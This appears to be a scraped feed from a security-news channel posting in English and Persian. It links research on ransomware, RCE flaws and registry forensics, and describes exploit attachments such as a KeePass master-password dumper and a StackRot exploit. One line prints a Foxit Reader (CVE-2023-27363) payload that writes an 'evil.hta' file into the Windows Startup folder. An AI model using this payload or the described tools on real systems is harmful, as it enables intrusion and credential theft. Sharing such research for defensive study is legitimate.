ALPHV Ransomware Affiliate Targets Vulnerable Backup Installations to Gain Initial Access
Link : https://www.mandiant.com/resources/blog/alphv-ransomware-backup
@Engineer_Computer
Link : https://www.mandiant.com/resources/blog/alphv-ransomware-backup
@Engineer_Computer
keepass-password-dumper.zip
182 KB
🔓KeePass 2.X Master Password Dumper (CVE-2023-32784)
KeePass Master Password Dumper is a simple PoC tool used to dump the master password from KeePass's memory. Apart from the first password character, it is mostly able to recover the password in plaintext. No code execution on the target system is required, just a memory dump. It doesn't matter where the memory comes from - can be the process dump, swap file (pagefile.sys), hibernation file (hiberfil.sys) or RAM dump of the entire system. It doesn't matter whether or not the workspace is locked. It is also possible to dump the password from RAM after KeePass is no longer running, although the chance of that working goes down with the time it's been since then.
@Engineer_Computer
KeePass Master Password Dumper is a simple PoC tool used to dump the master password from KeePass's memory. Apart from the first password character, it is mostly able to recover the password in plaintext. No code execution on the target system is required, just a memory dump. It doesn't matter where the memory comes from - can be the process dump, swap file (pagefile.sys), hibernation file (hiberfil.sys) or RAM dump of the entire system. It doesn't matter whether or not the workspace is locked. It is also possible to dump the password from RAM after KeePass is no longer running, although the chance of that working goes down with the time it's been since then.
@Engineer_Computer
CVE-2023-27363.pdf
443.4 KB
🔥🔥🔥Foxit PDF Reader exportXFAData Exposed Dangerous Method RCE Vulnerability
(CVE-2023-27363) - PoC here.
PoC is deeply based in the previous work made by Sebastian Apelt aka bitshifter123 and publicly available in this repository. So this exploits a path traversal vuln (four backslashes) + arbitrary file write (HTA)
@Engineer_Computer
(CVE-2023-27363) - PoC here.
PoC is deeply based in the previous work made by Sebastian Apelt aka bitshifter123 and publicly available in this repository. So this exploits a path traversal vuln (four backslashes) + arbitrary file write (HTA)
@Engineer_Computer
foxit_cve_2023-27363_extracted.js
9.4 KB
timeout = app.setTimeOut("event.target.exportXFAData({cPath: \"/c/users/\" + identity.loginName + \"/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/evil.hta\"});
@Engineer_Computer
@Engineer_Computer
Mastering Bug Bounty.zip
895.3 KB
🔴 Mastering Bug Bounty: A Comprehensive Handbook for Ethical Hackers, authored by Aaron Rodriguez
@Engineer_Computer
@Engineer_Computer
The Red Team Guide.pdf
12.1 MB
The Red Team Guide.A practical guide for Red Teams and Offensive Security 241pages
@Engineer_Computer
@Engineer_Computer
Pentah0wnage: Pre-Auth RCE in Pentaho Business Analytics Server
Link : https://research.aurainfosec.io/pentest/pentah0wnage
@Engineer_Computer
Link : https://research.aurainfosec.io/pentest/pentah0wnage
@Engineer_Computer
Remote Code Execution Vulnerability in Azure Pipelines
Link : https://www.legitsecurity.com/blog/remote-code-execution-vulnerability-in-azure-pipelines-can-lead-to-software-supply-chain-attack
@Engineer_Computer
Link : https://www.legitsecurity.com/blog/remote-code-execution-vulnerability-in-azure-pipelines-can-lead-to-software-supply-chain-attack
@Engineer_Computer
Malicious Self-Extracting Archives
Link : https://www.crowdstrike.com/blog/self-extracting-archives-decoy-files-and-their-hidden-payloads
@Engineer_Computer
Link : https://www.crowdstrike.com/blog/self-extracting-archives-decoy-files-and-their-hidden-payloads
@Engineer_Computer
Australian Open Source Intelligence Gathering Resources, Australias Largest Open Source Intelligence Repository for Cyber Professionals and Ethical Hackers
https://github.com/DFW1N/DFW1N-OSINT/
@Engineer_Computer
https://github.com/DFW1N/DFW1N-OSINT/
@Engineer_Computer
GitHub
GitHub - DFW1N/DFW1N-OSINT: Australian Open Source Intelligence Gathering Resources, …
Australian Open Source Intelligence Gathering Resources, Australias Largest Open Source Intelligence Repository for Cybe...
ELINT.pdf
563.7 KB
📡The E-Intelligence System
"Electronic Intelligence (ELINT), often known as E-Intelligence, is intelligence obtained through electronic sensors. Other than personal communications, ELINT intelligence is usually obtained. The goal is usually to determine a target's capabilities, such as radar placement. Active or passive sensors can be employed to collect data. A provided signal is analyzed and contrasted to collected data for recognized signal types.
The information may be stored if the signal type is detected; it can be classed as new if no match is found. ELINT collects and categorizes data. In a military setting (and others that have adopted the usage, such as a business), intelligence helps an organization make decisions that can provide them a strategic advantage over the competition. The term "intel" is frequently shortened. The two main subfields of signals intelligence (SIGINT) are ELINT and Communications Intel (COMINT)."
#Intelligence #SIGINT #ELINT #radar #signal #Electronic_Warfare #UAV #ESM
"Electronic Intelligence (ELINT), often known as E-Intelligence, is intelligence obtained through electronic sensors. Other than personal communications, ELINT intelligence is usually obtained. The goal is usually to determine a target's capabilities, such as radar placement. Active or passive sensors can be employed to collect data. A provided signal is analyzed and contrasted to collected data for recognized signal types.
The information may be stored if the signal type is detected; it can be classed as new if no match is found. ELINT collects and categorizes data. In a military setting (and others that have adopted the usage, such as a business), intelligence helps an organization make decisions that can provide them a strategic advantage over the competition. The term "intel" is frequently shortened. The two main subfields of signals intelligence (SIGINT) are ELINT and Communications Intel (COMINT)."
#Intelligence #SIGINT #ELINT #radar #signal #Electronic_Warfare #UAV #ESM
StackRot.zip
11.5 MB
🔥🔥🔥exploitation write-up & exploit code of StackRot (CVE-2023-3269) now available(Github repo)!
@Engineer_Computer
@Engineer_Computer
با Wazuh و Nmap اسکن کن و خروجی رو به ChatGPT بده
@Engineer_Computer
آزمایشگاه کامل در لینک زیر
https://wazuh.com/blog/nmap-and-chatgpt-security-auditing/
@Engineer_Computer
آزمایشگاه کامل در لینک زیر
https://wazuh.com/blog/nmap-and-chatgpt-security-auditing/
Wazuh
Nmap and ChatGPT security auditing with Wazuh | Wazuh
Nmap (network mapper) is an open source security scanner used for network exploration and security auditing.
مروری بر تحلیل رجیستری
@Engineer_Computer
https://gbhackers-com.cdn.ampproject.org/c/s/gbhackers.com/windows-registry-analysis-tracking-everything-you-do-on-the-system/amp/
@Engineer_Computer
https://gbhackers-com.cdn.ampproject.org/c/s/gbhackers.com/windows-registry-analysis-tracking-everything-you-do-on-the-system/amp/
GBHackers Security | #1 Globally Trusted Cyber Security News Platform
Windows Registry Analysis - Tracking Every Activity That You Do on the Windows System
Windows Registry Analysis-Tracking Every activity, Windows registry, SOC, IDS, IPS, Hacking news, Cybersecurity updates, Forensic Analysis
دیگر ابزار بررسی و واکاوی رجیستری
Regripper
@Engineer_Computer
https://www.sans.org/blog/regripper-ripping-registries-with-ease/
Regripper
@Engineer_Computer
https://www.sans.org/blog/regripper-ripping-registries-with-ease/
www.sans.org
SANS Digital Forensics and Incident Response Blog | RegRipper: Ripping Registries With Ease | SANS Institute
SANS Digital Forensics and Incident Response Blog blog pertaining to RegRipper: Ripping Registries With Ease
ابزاری برای آسان نمودن هک
WormGPT
توسط این ابزار ؛ هکر های تازه کار میتوانند در سطح بالاتری اقدامات خرابکارانه را انجام دهند. 😱
@Engineer_Computer
https://www.scmagazine.com/news/threat-intelligence/crimeware-tool-wormgpt-ai-bec
WormGPT
توسط این ابزار ؛ هکر های تازه کار میتوانند در سطح بالاتری اقدامات خرابکارانه را انجام دهند. 😱
@Engineer_Computer
https://www.scmagazine.com/news/threat-intelligence/crimeware-tool-wormgpt-ai-bec
SC Media
Crimeware tool WormGPT: AI for BEC attacks
Cybercriminals are cashing in on the generative AI hype with a dedicated version of the technology catering to crooks
@Engineer_Computer.pdf
88 KB
🗒 Bypassing XSS Detection Mechanisms
@Engineer_Computer
@Engineer_Computer
جایی که باید دانست همیشه نمیتوان دانست :
مایکروسافت هنوز نمیداند!⛳️
Microsoft says it still doesn't know how Chinese hackers stole an inactive Microsoft account (MSA) consumer signing key used to breach the Exchange Online and Azure AD accounts of two dozen organizations, including government agencies.
@Engineer_Computer
https://www-bleepingcomputer-com.cdn.ampproject.org/c/s/www.bleepingcomputer.com/news/microsoft/microsoft-still-unsure-how-hackers-stole-azure-ad-signing-key/amp/
مایکروسافت هنوز نمیداند!⛳️
Microsoft says it still doesn't know how Chinese hackers stole an inactive Microsoft account (MSA) consumer signing key used to breach the Exchange Online and Azure AD accounts of two dozen organizations, including government agencies.
@Engineer_Computer
https://www-bleepingcomputer-com.cdn.ampproject.org/c/s/www.bleepingcomputer.com/news/microsoft/microsoft-still-unsure-how-hackers-stole-azure-ad-signing-key/amp/
www-bleepingcomputer-com.cdn.ampproject.org
Microsoft still unsure how hackers stole Azure AD signing key
Microsoft says it still doesn't know how Chinese hackers stole an inactive Microsoft account (MSA) consumer signing key used to breach the Exchange Online and Azure AD accounts of two dozen organizations, including government agencies.